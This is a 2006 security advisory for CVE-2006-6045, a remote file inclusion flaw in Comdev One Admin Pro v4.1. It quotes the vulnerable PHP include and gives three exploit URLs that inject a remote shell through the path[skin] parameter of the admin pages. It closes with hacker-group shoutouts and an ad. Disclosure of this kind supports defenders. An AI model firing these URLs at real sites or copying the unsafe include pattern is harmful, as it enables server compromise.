Comdev One Admin Pro.v4.1 ( path[skin] ) Remote File include
SecurityAlert : 1902 CVE : CVE-2006-6045 SecurityRisk : High (About) Remote Exploit : Yes Local Exploit : No Exploit Available : Yes Credit : AG- Spider (ag-spider msn com) Published : 27.11.2006
Affected Software :
One Admin Pro.v4.1
Advisory Content :
##############################################################
#
# Comdev One Admin Pro.v4.1 ( path[skin] ) Remote File include
#
##############################################################
# Found by : AG-Spider
# C0ntAct : AG-Spider [at] msn [dot] com
# Affected Software : One Admin Pro.v4.1
# Download Script : http://www.conovo.de/script/OneAdminPro.v4.1.zip
###############################################################
#
# <? include($path["docroot"].$path["skin"].
#
##############################################################
#
# Exploit :-
#
# http://www.$ite.com/adminfoot.php?path[skin]=[Spider Shell]?
# http://www.$ite.com/adminhead.php?path[skin]=[Spider Shell]?
# http://www.$ite.com/adminlogin.php?path[skin]=[Spider Shell]?
#
#############################################################
#
#
# Shoutz : Black-c0de <> KaBaRa.HaCk.eGy <> KILLERxXx <>
CRASH_OVER_RIDE
<>
# SwEEt-deVil <>
Young
Hacker
#
# Arab Security Team
#############################################################
_________________________________________________________________
Windows Live? Messenger has arrived. Click here to download it for free!
http://imagine-msn.com/messenger/launch80/?locale=en-gb
Feedback :
If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com.